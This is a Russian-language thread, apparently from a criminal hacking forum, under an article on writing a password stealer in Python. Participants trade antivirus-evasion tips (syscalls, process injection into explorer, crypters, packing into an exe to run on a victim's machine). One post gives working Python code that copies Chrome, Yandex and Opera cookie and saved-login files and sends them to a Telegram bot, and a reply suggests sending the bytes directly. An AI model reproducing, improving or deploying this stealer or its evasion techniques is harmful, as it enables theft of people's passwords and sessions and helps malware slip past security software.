• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Пишем стиллер паролей на Python

Syscall - вызов сервиса ядра, havens gate - точка перехода из wow64 в 64бит режим.
Еще раз повторюсь - сигнатуры это отсеевание бездарного говна до того как оно вообще будет исполнено, хуки в нтдлл(библиотека в основном занимается тем делает syscall для апи) отсивают все прочее более хитрое говно.
берете тулзу которая вам покажет все хуки во всех запущенных процессах, смотрите что за апи похуканы, разбираетесь куда ведут эти хуки и начинаете схематично понимать что и как работает.
Да в принципе мне это не особо надо я свой криптор писал и он у меня отрабатывает и в скантайме и в рантайме одинаково хорошо это я по результатам тестирования говорю. Так же и cтиллер. Ради рассширения кругозора посмотрю.
 
Да в принципе мне это не особо надо я свой криптор писал и он у меня отрабатывает и в скантайме и в рантайме одинаково хорошо это я по результатам тестирования говорю. Так же и cтиллер. Ради рассширения кругозора посмотрю.
Тогда придется мне признать что я дибил...хз как теперь дальше жить.
 
Тогда придется мне признать что я дибил...хз как теперь дальше жить.
А мне придеться признать что я не особо понимаю ваш сарказм. Могу вам бесплатно закриптовать бесплатно если вы сомневаетесь в правдивости моих слов.
 
А мне придеться признать что я не особо понимаю ваш сарказм. Могу вам бесплатно закриптовать бесплатно если вы сомневаетесь в правдивости моих слов.
Вы очень добры, но у меня нет проблем с криптованием.
А сарказмов никаких нет, есть вы который не зморичивается с сисколлами и разборами кто там что хукает и как все это обойти, и при этом у вас все сухо и комфортно не смотря на критичиские дни, и есть я с полной жопой торбой расширителей кругозора ...ну да не будем про грустное.
 
Разве я с чем то был не согласен?..я просто спрашивал.
По своему опыту знаю что если занжектиться в хороший процесс то аверы вас в нем будут любить больше =)..но наверное это не про питон.
Ну я попробовал инжектить в explorer процесс и нод ничего не заподозрил. При этом касперский подозрит любое действие с инжектом даже в пользовательские процессы.
 
Ну я попробовал инжектить в explorer процесс и нод ничего не заподозрил. При этом касперский подозрит любое действие с инжектом даже в пользовательские процессы.
Прбуйте сисколлы и без использования крейт ремот тред.
 
Я сделал похожий скрипт, но теперь не знаю, как запустить его на чужом пк. Разве того, что я запихну его в ехе файл, будет достаточно? Не придется устанавливать питон и библиотеки, если у жертвы их нет. И плюс, разве не надо писать лоадер?
 
Я сделал похожий скрипт, но теперь не знаю, как запустить его на чужом пк. Разве того, что я запихну его в ехе файл, будет достаточно? Не придется устанавливать питон и библиотеки, если у жертвы их нет. И плюс, разве не надо писать лоадер?
Упаковщик запакует в exe и все зависимости и сам интерпретатор впридачу.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я модифицировал стиллер, чтобы он отправлял данные в телеграм, жду мнения людей более опытных, чем

import getpass
import random
import telebot

# Replace "YOUR_BOT_TOKEN" with your actual bot token
bot = telebot.TeleBot("YOUR_BOT_TOKEN")

fldr = 'C:\\Users'+'\\' + getpass.getuser()+'\\AppData\\'
files = [
("google","Local\\Google\\Chrome\\User Data\\Default\\Cookies","Local\\Google\\Chrome\\User Data\\Default\\Login Data"),
("yandex","Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies","Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"),
("opera","Roaming\\Opera Software\\Opera Stable\\Cookies","Roaming\\Opera Software\\Opera Stable\\Login Data")
#("firefox", "", "")
]

def check():
global files
for f in files:
bid = str(random.randint(1, 10000))
try:
with open(fldr+f[1], "rb") as content:
open(f[0]+'_cookie'+bid, 'wb').write(content.read())
# Send the cookie file to Telegram
bot.send_document(chat_id="YOUR_TELEGRAM_CHAT_ID", document=open(f[0]+'_cookie'+bid, 'rb'))
with open(fldr+f[2], "rb") as content:
open(f[0]+'_pass'+bid, 'wb').write(content.read())
# Send the password file to Telegram
bot.send_document(chat_id="YOUR_TELEGRAM_CHAT_ID", document=open(f[0]+'_pass'+bid, 'rb'))
except Exception as err:
#print(err)
print('There is no '+f[0]+' here.')

check()
 
Я модифицировал стиллер, чтобы он отправлял данные в телеграм, жду мнения людей более опытных, чем
1. Для начала хорошо бы вставить код, как специальный блок на форуме, чтобы его можно было прочитать
2. Тебе не обязательно сохранять данные в файл, чтобы потом открыть файл при отправке в телеграм. Передавай байты напрямую, уйди от использования файлов.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
https://xss.pro/threads/80981/#post-560557
Я разместил код в этой теме, я последую вашему совету и поработаю над лучшей версией.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх